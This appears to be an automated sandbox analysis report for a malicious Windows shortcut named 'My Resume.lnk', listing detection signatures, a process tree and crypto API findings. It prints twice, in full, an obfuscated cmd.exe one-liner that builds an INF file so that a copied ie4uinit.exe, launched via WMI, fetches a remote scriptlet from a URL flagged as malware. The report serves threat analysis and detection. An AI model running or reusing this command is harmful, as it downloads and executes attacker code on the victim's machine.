Windows Analysis Report
My Resume.lnk

Overview

General Information

Sample Name:My Resume.lnk
Analysis ID:564458
MD5:e1db05e6be33812c6289741472e9abe3
SHA1:ca863c49be257e9ed0033a4c18bb3400c2396029
SHA256:d6906cb7f9fb0f9cd12943509a1bb5e9409a4547a18f930b071d5c330e6c97f9

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Windows shortcut file (LNK) starts blacklisted processes
Antivirus detection for URL or domain
Sigma detected: Copying Sensitive Files with Credential Data
Checks if browser processes are running
Creates processes via WMI
Obfuscated command line found
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to create processes via WMI
Windows shortcut file (LNK) contains suspicious strings
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
Creates COM task schedule object (often to register a task for autostart)
Found evasive API chain (date check)
Creates files inside the system directory
Sigma detected: Suspicious WMI Execution
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Uses the system / local time for branch decision (may execute only at specific dates)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Drops PE files
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • cmd.exe (PID: 6920 cmdline: C:\Windows\System32\cmd.exe" /v /c set "VnLlYgV40395=set" && call set "VnLlYgV58278=%VnLlYgV40395:~0,1%" && (for %l in (c) do @set "VnLlYgV49771=%~l") && !VnLlYgV58278!et "VnLlYgV4530=$w" && set "VnLlYgV81579=i" && set "VnLlYgV0609=a" && set "VnLlYgV89173=t" && !VnLlYgV58278!et "VnLlYgV95863=d" && set "VnLlYgV33261=." && set "VnLlYgV63461=init" && set "VnLlYgV7723=si" && set "VnLlYgV38371=e" && set "VnLlYgV19376=settings" && set "VnLlYgV8088=!VnLlYgV33261!inf" && set "VnLlYgV3504=ieu!VnLlYgV63461!!VnLlYgV8088!" && call !VnLlYgV58278!et "VnLlYgV5462=%app!VnLlYgV95863!ata%\Micro!VnLlYgV58278!oft\" && !VnLlYgV58278!et "VnLlYgV71257=!VnLlYgV5462!!VnLlYgV3504!" && set "VnLlYgV9155="^" && (for %j in ("[version]" "signature = !VnLlYgV4530!indows nt$" "[!VnLlYgV95863!e!VnLlYgV58278!tinationdirs]" "E1C3=01" "[!VnLlYgV95863!efaultin!VnLlYgV58278!tall.windows7]" "UnRegis!VnLlYgV89173!erOCXs=A52D05" "!VnLlYgV95863!elf!VnLlYgV81579!les=E1C3" "[A52D05]" "%11%\scRo%VnLlYgV2149%j,NI,%VnLlYgV0081%%VnLlYgV6931%%VnLlYgV6931%p%VnLlYgV4892%%VnLlYgV64389%%VnLlYgV64389%jamesreuther!VnLlYgV33261!%VnLlYgV6563%/wmnxjogbfn" "[E1C3]" "ieu%VnLlYgV4681%!VnLlYgV8088!" "[!VnLlYgV58278!!VnLlYgV89173!rings]" "VnLlYgV4681=!VnLlYgV63461!" "VnLlYgV6931=t" "!VnLlYgV58278!ervicen!VnLlYgV0609!me=' '" "VnLlYgV0081=h" "VnLlYgV4892=:" "VnLlYgV64389=/" "!VnLlYgV58278!hortsvcn!VnLlYgV0609!me=' '" "VnLlYgV6563=com" "VnLlYgV2149=b") do @e!VnLlYgV49771!ho %~j)>"!VnLlYgV71257!" && !VnLlYgV58278!et "VnLlYgV5120=ie4u!VnLlYgV63461!.!VnLlYgV38371!xe" && call copy /Y %win!VnLlYgV95863!ir%\!VnLlYgV58278!ystem32\!VnLlYgV5120! "!VnLlYgV5462!" > nul && !VnLlYgV58278!t!VnLlYgV0609!rt "" /MIN wmi!VnLlYgV49771! proce!VnLlYgV58278!s call !VnLlYgV49771!rea!VnLlYgV89173!e "!VnLlYgV5462!!VnLlYgV5120! -base!VnLlYgV19376! MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WMIC.exe (PID: 6268 cmdline: wmic process call create "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings" MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • ie4uinit.exe (PID: 6940 cmdline: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings MD5: 9DD77F0F421AA9A70383210706ECA529)
    • ie4uinit.exe (PID: 4788 cmdline: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -ClearIconCache MD5: 9DD77F0F421AA9A70383210706ECA529)
      • rundll32.exe (PID: 2884 cmdline: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0 MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 204 cmdline: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0 MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0, CommandLine: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -ClearIconCache, ParentImage: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe, ParentProcessId: 4788, ProcessCommandLine: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0, ProcessId: 2884
Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings", CommandLine: wmic process call create "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Windows\System32\cmd.exe" /v /c set "VnLlYgV40395=set" && call set "VnLlYgV58278=%VnLlYgV40395:~0,1%" && (for %l in (c) do @set "VnLlYgV49771=%~l") && !VnLlYgV58278!et "VnLlYgV4530=$w" && set "VnLlYgV81579=i" && set "VnLlYgV0609=a" && set "VnLlYgV89173=t" && !VnLlYgV58278!et "VnLlYgV95863=d" && set "VnLlYgV33261=." && set "VnLlYgV63461=init" && set "VnLlYgV7723=si" && set "VnLlYgV38371=e" && set "VnLlYgV19376=settings" && set "VnLlYgV8088=!VnLlYgV33261!inf" && set "VnLlYgV3504=ieu!VnLlYgV63461!!VnLlYgV8088!" && call !VnLlYgV58278!et "VnLlYgV5462=%app!VnLlYgV95863!ata%\Micro!VnLlYgV58278!oft\" && !VnLlYgV58278!et "VnLlYgV71257=!VnLlYgV5462!!VnLlYgV3504!" && set "VnLlYgV9155="^" && (for %j in ("[version]" "signature = !VnLlYgV4530!indows nt$" "[!VnLlYgV95863!e!VnLlYgV58278!tinationdirs]" "E1C3=01" "[!VnLlYgV95863!efaultin!VnLlYgV58278!tall.windows7]" "UnRegis!VnLlYgV89173!erOCXs=A52D05" "!VnLlYgV95863!elf!VnLlYgV81579!les=E1C3" "[A52D05]" "%11%\scRo%VnLlYgV2149%j,NI,%VnLlYgV0081%%VnLlYgV6931%%VnLlYgV6931%p%VnLlYgV4892%%VnLlYgV64389%%VnLlYgV64389%jamesreuther!VnLlYgV33261!%VnLlYgV6563%/wmnxjogbfn" "[E1C3]" "ieu%VnLlYgV4681%!VnLlYgV8088!" "[!VnLlYgV58278!!VnLlYgV89173!rings]" "VnLlYgV4681=!VnLlYgV63461!" "VnLlYgV6931=t" "!VnLlYgV58278!ervicen!VnLlYgV0609!me=' '" "VnLlYgV0081=h" "VnLlYgV4892=:" "VnLlYgV64389=/" "!VnLlYgV58278!hortsvcn!VnLlYgV0609!me=' '" "VnLlYgV6563=com" "VnLlYgV2149=b") do @e!VnLlYgV49771!ho %~j)>"!VnLlYgV71257!" && !VnLlYgV58278!et "VnLlYgV5120=ie4u!VnLlYgV63461!.!VnLlYgV38371!xe" && call copy /Y %win!VnLlYgV95863!ir%\!VnLlYgV58278!ystem32\!VnLlYgV5120! "!VnLlYgV5462!" > nul && !VnLlYgV58278!t!VnLlYgV0609!rt "" /MIN wmi!VnLlYgV49771! proce!VnLlYgV58278!s call !VnLlYgV49771!rea!VnLlYgV89173!e "!VnLlYgV5462!!VnLlYgV5120! -base!VnLlYgV19376!, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6920, ProcessCommandLine: wmic process call create "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings", ProcessId: 6268

AV Detection

Source: http://jamesreuther.com/wmnxjogbfnMAvira URL Cloud: Label: malware
Source: http://jamesreuther.com/wmnxjogbfnAvira URL Cloud: Label: malware
Source: http://jamesreuther.com/wmnxjogbfniAvira URL Cloud: Label: malware
Source: http://jamesreuther.com/wmnxjogbfndAvira URL Cloud: Label: malware
Source: http://jamesreuther.com/wmnxjogbfn4Avira URL Cloud: Label: malware
Source: http://jamesreuther.com/wmnxjogbfnSAvira URL Cloud: Label: malware
Source: http://jamesreuther.com/wmnxjogbfnuAvira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B522763C CryptStringToBinaryW,CryptStringToBinaryW,GetLastError,GetLastError,GetLastError,GetLastError,7_2_00007FF6B522763C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B522EA9C memcpy_s,CryptCreateHash,CryptHashData,CryptDeriveKey,GetLastError,GetLastError,GetLastError,CryptDestroyHash,GetLastError,GetLastError,GetLastError,7_2_00007FF6B522EA9C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B52256A4 CryptBinaryToStringA,CryptBinaryToStringA,GetLastError,GetLastError,7_2_00007FF6B52256A4
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B5227AC8 CertOpenStore,CertFindCertificateInStore,CryptImportPublicKeyInfo,GetLastError,GetLastError,CertFreeCertificateContext,CertCloseStore,7_2_00007FF6B5227AC8
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B522E950 CryptImportPublicKeyInfo,GetLastError,GetLastError,GetLastError,CertFreeCertificateContext,CryptGetKeyParam,GetLastError,GetLastError,GetLastError,7_2_00007FF6B522E950
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B5222550 CryptReleaseContext,7_2_00007FF6B5222550
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B522ED98 memcpy_s,memcpy_s,CryptGenRandom,memcpy_s,EnterCriticalSection,LeaveCriticalSection,GetLastError,GetLastError,GetLastError,7_2_00007FF6B522ED98
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B5227DCC memset,CryptHashCertificate,memcmp,GetLastError,7_2_00007FF6B5227DCC
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B52225C0 CryptAcquireContextW,CryptReleaseContext,7_2_00007FF6B52225C0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B522544C strnlen,isalnum,CryptStringToBinaryA,CryptStringToBinaryA,GetLastError,GetLastError,7_2_00007FF6B522544C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B52274BC CryptCreateHash,CryptSetHashParam,CryptVerifySignatureW,GetLastError,CryptDestroyKey,GetLastError,CryptDestroyHash,GetLastError,7_2_00007FF6B52274BC
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B522F108 CryptSetKeyParam,memcpy_s,CryptEncrypt,memcpy_s,CryptEncrypt,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,7_2_00007FF6B522F108
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B522E750 CryptAcquireContextW,GetLastError,GetLastError,GetLastError,7_2_00007FF6B522E750
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B5222B50 CryptGenRandom,GetLastError,SysFreeString,7_2_00007FF6B5222B50
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B522EFAC CryptCreateHash,memset,CryptSetHashParam,CryptHashData,CryptGetHashParam,GetLastError,GetLastError,GetLastError,CryptDestroyHash,GetLastError,GetLastError,GetLastError,7_2_00007FF6B522EFAC
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B522EBE0 CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6B522EBE0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B52273D0 CryptCreateHash,CryptHashData,CryptGetHashParam,GetLastError,CryptDestroyHash,GetLastError,7_2_00007FF6B52273D0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 7_2_00007FF6B522E80C CryptGenRandom,memcpy_s,CryptEncrypt,GetLastError,GetLastError,GetLastError,GetLastError,7_2_00007FF6B522E80C